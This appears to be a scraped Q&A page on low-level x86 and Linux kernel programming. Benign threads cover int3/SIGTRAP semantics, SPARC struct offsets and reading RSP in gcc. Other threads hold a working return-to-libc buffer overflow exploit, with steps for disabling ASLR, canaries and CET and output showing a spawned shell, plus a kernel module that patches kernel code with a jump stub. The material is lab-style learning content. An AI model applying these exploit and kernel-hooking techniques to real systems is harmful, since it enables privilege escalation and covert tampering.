Hijack Syscall: Access system call arguments from struct pt_regs (64bit-x86) - c

Using kprobes pre_handler, I am trying to access the system call arguments from struct pt_regs and modify them(which is the main goal), before calling the actual system call itself.
Say I am probing sys_link.
asmlinkage long sys_link(const char __user *oldname, const char __user *newname);
The pre_handler is defined as follows:(from here)
static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
printk(KERN_INFO "eax: %08lx ebx: %08lx ecx: %08lx edx: %08lx\n",
regs->orig_ax, regs->bx, regs->cx, regs->dx);
printk(KERN_INFO "esi: %08lx edi: %08lx ebp: %08lx esp: %08lx\n",
regs->si, regs->di, regs->bp, regs->sp);
printk(KERN_INFO "Process %s (pid: %d, threadinfo=%p task=%p)",
current->comm, current->pid, current_thread_info(), current);
return 0;
}
When I run link file1 file2 on the terminal, dmesg gives the following output:
[15105.691463] eax: ffffffffffffffff ebx: 7fff3e2e71c8 ecx: 7fff3e2e6e50 edx: 00000003
[15105.691467] esi: 7fff3e2e9478 edi: 7fff3e2e9472 ebp: 00000003 esp: ffff880022b0ff80
[15105.691472] Process link (pid: 9448, threadinfo=ffff880022b0e000 task=ffff880018b72e00)Pid: 9448, comm: link Tainted: P C O 3.2.0-53-generic #81-Ubuntu
The first two arguments go to registers edi and esi, therefore in this case, edi must contain address of file1 and esi must contain address of file2.
I want to modify these register values, say change the value in esi to point to file3 (therefore the char __user *newname is now pointing to file3), before I return from the pre_handler. Given such a modification, now sys_link should work with file1 and file3 as its arguments.
Is this possible? If so, how?

Related

x86, amd64: Why SIGTRAP' ucontext instruction pointer does not point to related int3

As the title says - rip from ucontext_t does not point to the int3 that raised a SIGTRAP. Instead it points to the next instruction.
This deviates from my (naive) expectations that every faulted instruction will be retried upon return from signal handler (if context was not changed and process did not explicitly terminate while in the handler).
On the other hand when getting SIGILL - context points to the bad instruction. also on ARM and Aarch64 - SIGTRAP context also points to the related bkpt #0/bpt #0.
Test program:
/* sigtest.c */
#define _GNU_SOURCE
#include <stdio.h>
#include <signal.h>
#include <ucontext.h>
extern void do_int3(void);
extern void do_ud2(void);
void sighandler(int signo, siginfo_t* info, void* context) {
struct ucontext_t* uctx = context;
/* Yes, printf() here is bad. I promise to never ever do this in real programs */
printf("Got signal %d:\n"
"\tsi_addr: %p\n"
"\tcontext RIP: %p\n",
signo,
info->si_addr,
(void*)uctx->uc_mcontext.gregs[REG_RIP]);
}
int main(int argc, char** argv) {
struct sigaction sa = {};
sa.sa_flags = SA_SIGINFO | SA_ONESHOT;
sa.sa_sigaction = sighandler;
sigemptyset(&sa.sa_mask);
sigaction(SIGTRAP, &sa, NULL);
sigaction(SIGILL, &sa, NULL);
void (*fn)(void) = 0;
if (argv[1][0] == 't') {
fn = do_int3;
}
if (argv[1][0] == 'u') {
fn = do_ud2;
}
printf("call function at %p\n", fn);
fn();
printf("call returned\n");
}
; do_int3.S
.text
.globl do_int3
.type do_int3, #function
do_int3:
int3
ret
.size do_int3, .-do_int3
; do_ud2.S
.text
.globl do_ud2
.type do_ud2, #function
do_ud2:
ud2
ret
.size do_ud2, .-do_ud2
Compile and run:
$ cc sigtest.c do_int3.S do_ud2.S
$ ./a.out t
call function at 0x5620b87c6908
Got signal 5:
si_addr: (nil)
context RIP: 0x5620b87c6909
call returned
$ ./a.out u
call function at 0x557d1bc1590a
Got signal 4:
si_addr: 0x557d1bc1590a
context RIP: 0x557d1bc1590a
Illegal instruction (core dumped)
It is easy to notice that for SIGTRAP rip value point to the next instruction rather than to the int3.
Why is instruction pointer adjusted in SIGTRAP context to not retry related int3?
Why is instruction pointer adjusted in SIGTRAP context to not retry related int3?
It's not adjusted by the kernel; the exception-return address pushed by hardware is the one after an int instruction, including int3.
Keep in mind that int3 is only slightly different from the normal case of int n such as int 0x80. int is designed as being like a syscall or far-call, so the (exception) return address is the one after the int. Otherwise an int 0x80 system call would re-run itself forever unless the kernel edited the exception-return info before iret.
So why doesn't Linux's int3 / int 3 handler decrement the saved RIP by 1? For one thing, debuggers can do that in software if they want to, and keeping the kernel simple is better. (For both maintenance, efficiency, and less demangling for software that does want to know the address pushed by hardware.)
For another, a fixed offset of 1 byte wouldn't always be correct: 2-byte CD 03 int 3 raises the same exception as 1-byte CC int3. And even if you wanted to try, x86 machine code doesn't uniquely decode backwards, so obfuscated machine code could give an address that wasn't the actual start of the instruction that executed. (Although it would run as int 3 or int3 if decoded from there). e.g. 2-byte rep int3 is indistinguishable from add al, 0xf3 / int3 if looking backwards.
Software like GDB that inserts an int3 will know what it inserted, and needs to know about the target machine details, so can deal with the offset.

Return to libc buffer overflow attack

I tried to make a return to libc buffer overflow. I found all the addresses for system, exit and /bin/sh, I don't know why, but when I try to run the vulnerable program nothing happens.
system, exit address
/bin/sh address
Vulnerable program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif
int bof(FILE* badfile)
{
char buffer[BUF_SIZE];
fread(buffer, sizeof(char), 300, badfile);
return 1;
}
int main(int argc, char** argv)
{
FILE* badfile;
char dummy[BUF_SIZE * 5];
badfile = fopen("badfile", "r");
bof(badfile);
printf("Return properly.\n");
fclose(badfile);
return 1;
}
Exploit program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buf[40];
FILE* badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe1e; // /bin/sh
*(long *) &buf[20] = 0xb7e369d0; // exit
*(long *) &buf[16] = 0xb7e42da0; // system
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
return 1;
}
And this is the program that I use to find MYSHELL address(for /bin/sh)
#include <stdio.h>
void main()
{
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Terminal:
Terminal image after run retlib
First, there are a number of mitigations that might be deployed to prevent this attack. You need to disable each one:
ASLR: You have already disabled with sudo sysctl -w kernel.randomize_va_space=0. But a better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash.
Stack protector: The compiler can place stack canaries between the buffer and the return address on the stack, write a value into it before the buffer write operation is executed, and then just before returning, verify that it has not been changed by the buffer write operation. This can be disabled with -fno-stack-protector.
Shadow stack: Newer processors might have a shadow stack feature (Intel CET) that when calling a function, stashes a copy of the return address away from the writable memory, which is checked against the return address when returning from the current function. This (and some other CET protections) can disabled with -fcf-protection=none.
The question does not mention it, but the addresses used in the code (along with use of long) indicate that a 32-bit system is targeted. If the system used is 64-bit, -m32 needs to be added to the compiler flags:
gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from shell are identical (at least in length). If one is executed as a.out, the other should also be executed as a.out. One being in a different path, having a different argv will move the environment variable.
Alternatively, you can print the address of the environment variable from within the vulnerable binary.
By looking at the disassembly of bof function, the distance between the buffer and the return address can be determined:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread#plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp) is used as the first parameter to fread, which is the buffer that will be overflowed. Also note that ebp was the value of esp just after pushing ebp in the first instruction. So, ebp points to the saved ebp, which is followed by the return address. That means from the start of the buffer, saved ebp is 20 bytes away, and return address is 24 bytes away.
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$

Char Array conversion from C to SPARC

Consider the C source code statements shown below.
struct person
{
char name[30];
int id;
int points;
};
char Fmt[] = "Name: %s ID: %d Points: %d\n";
void display_one( struct person List[], int I )
{
printf( Fmt, List[I].name, List[I].id, List[I].points );
}
Complete the SPARC assembly language code segment below so that the sequence
of assembly language statements is equivalent to the C statements above.
.section ".data"
.align 4
Fmt: .asciz "Name: %s ID: %d Points: %d\n"
.global display_one
.section ".text"
.align 4
display_one:
save %sp, -96, %sp
smul %i1, 40, %l1
add %i0, %l1, %l0
set Fmt, %o0
mov %l0, %o1
ld [%l0+32], %o2
ld [%l0+36], %o3
call printf
nop
ret
restore
I was wondering what the smul %i1, 40, %l1 line is doing. I don't understand why it is multiplying by 40. If anyone could explain that would be great. Thanks.
40 is the size of struct person:
char name[30]; // 30 bytes
// 2 bytes padding to make the following int aligned
int id; // 4 bytes
int points; // 4 bytes
The parameter I is multiplied by 40 to compute the address of List[I].

Accessing a register without using inline assembly with gcc

I want to read the stack pointer register value without writing inline assembly.The reason I want to do this is because I want to assign the stack pointer register value to an element of an array and I find it cumbersome to access an array using inline assembly. So I would want to do something like that.
register "rsp" long rsp_alias; <--- How do I achieve something like that in gcc?
long current_rsp_value[NUM_OF_THREADS];
current_rsp_value[tid] = rsp_alias;
Is there anything like that possible with gcc?
There's a shortcut:
register long rsp asm ("rsp");
Demo:
#include<stdio.h>
void foo(void)
{
register long rsp asm ("rsp");
printf("RSP: %lx\n", rsp);
}
int main()
{
register long rsp asm ("rsp");
printf("RSP: %lx\n", rsp);
foo();
return 0;
}
Gives:
$ gdb ./a.out
GNU gdb (Gentoo 7.2 p1) 7.2
...
Reading symbols from /home/user/tmp/a.out...done.
(gdb) break foo
Breakpoint 1 at 0x400538: file t.c, line 7.
(gdb) r
Starting program: /home/user/tmp/a.out
RSP: 7fffffffdb90
Breakpoint 1, foo () at t.c:7
7 printf("RSP: %lx\n", rsp);
(gdb) info registers
....
rsp 0x7fffffffdb80 0x7fffffffdb80
....
(gdb) n
RSP: 7fffffffdb80
8 }
Taken from the Variables in Specified Registers documentation.
register const long rsp_alias asm volatile("rsp");

there are errors to replace Linux kernel function

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/types.h>
#define CODESIZE 7
static unsigned char original_code[CODESIZE];
static unsigned char jump_code[CODESIZE] =
"\xb8\x00\x00\x00\x00" /* movq $0, %rax */
"\xff\xe0" /* jump *%rax */
;
void (*sync_readahead)( struct address_space *mapping, struct file_ra_state *ra, struct file *filp, pgoff_t offset, unsigned long req_size ) = (void (*)(struct address_space *, struct file_ra_state *, struct file *, pgoff_t , unsigned long ) )0xc0197100;
int hijack_start(void);
void hijack_stop(void);
void intercept_init(void);
void intercept_start(void);
void intercept_stop(void);
void fake_printk(struct address_space *mapping, struct file_ra_state *ra, struct file *filp, pgoff_t offset, unsigned long req_size);
int hijack_start()
{
printk(KERN_INFO "I can haz hijack?\n" );
intercept_init();
return 0;
}
void hijack_stop()
{
intercept_stop();
return;
}
void intercept_init()
{
printk(KERN_INFO "in the intercept_init\n" );
memcpy( original_code, sync_readahead, 7 );
*(long *)&jump_code[1] = (long)fake_printk;
memcpy( sync_readahead, jump_code, 7 );
printk(KERN_INFO "in the hijack?\n" );
//real_printk=NULL;
printk(KERN_INFO "begin the hijack?\n" );
memcpy( sync_readahead, jump_code, CODESIZE );
printk(KERN_INFO "begin the hijack?\n" );
return;
}
void intercept_stop()
{
memcpy( sync_readahead, original_code, CODESIZE );
}
void fake_printk(struct address_space *map, struct file_ra_state *a, struct file *fil, pgoff_t offse, unsigned long req_siz)
{
printk(KERN_INFO "in the fake printk\n");
// return ret;
}
MODULE_LICENSE("GPL");
module_init( hijack_start );
module_exit( hijack_stop );
I want to replace Linux kernel function by address (/proc/kallsyms), but when I memcpy the new function to the address (Linux kernel):
memcpy( sync_readahead, jump_code, CODESIZE );
there are errors (segmentation fault). I have seen some examples to replace Linux kernel function in the same way. Would you please help me to solve the problem? Thank you very much.
Information as follows:
ubuntu kernel: [ 574.826458] *pde = 0087d067 *pte = 00197161
ubuntu kernel: [ 574.826468] Modules linked in: hijack(+) test(+) binfmt_misc bridge stp bnep input_polldev video output vmblock vsock vmmemctl vmhgfs pvscsi acpiphp lp ppdev pcspkr psmouse serio_raw snd_ens1371 gameport snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd soundcore snd_page_alloc vmci i2c_piix4 parport_pc parport intel_agp agpgart shpchp mptspi mptscsih mptbase scsi_transport_spi floppy fbcon tileblit font bitblit softcursor vmxnet
ubuntu kernel: [ 574.826491]
ubuntu kernel: [ 574.826493] Pid: 4694, comm: insmod Tainted: G D (2.6.28-11-generic #42-Ubuntu) VMware Virtual Platform
ubuntu kernel: [ 574.826496] EIP: 0060:[<f7c92101>] EFLAGS: 00010246 CPU: 0
ubuntu kernel: [ 574.826498] EIP is at intercept_init+0x41/0x70 [hijack]
ubuntu kernel: [ 574.826499] EAX: f5ec4b60 EBX: 00000000 ECX: ffffffff EDX: 00004c4c
ubuntu kernel: [ 574.826501] ESI: f7c9252c EDI: c0197100 EBP: f5edbe18 ESP: f5edbe0c
ubuntu kernel: [ 574.826502] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
ubuntu kernel: [ 574.826506] f7c921a6 f7c92130 00000000 f5edbe24 f7c92147 f7c921d5 f5edbf8c c010111e
ubuntu kernel: [ 574.826618] ---[ end trace ccc07e4b4d814976 ]---
Kernel function hijacking is very tricky business, and it needs to be exactly right in order to not run into all kinds of issues.
I am currently working on a module that does this, and it (at the time of this writing) works for 2.6.18+ kernels:
https://github.com/cormander/tpe-lkm
You'll be most interested in the hijacks.c file.
Many portions of this process are architecture, kernel version dependent, and CPU feature dependent as well.
UPDATE
The module now uses the 0XE9 jump opcode and should work for you. The nitty gritty details are in hijacks.c, and the "high level" logic you'll be most interested in is in the hijack_syscalls() function in security.c

Resources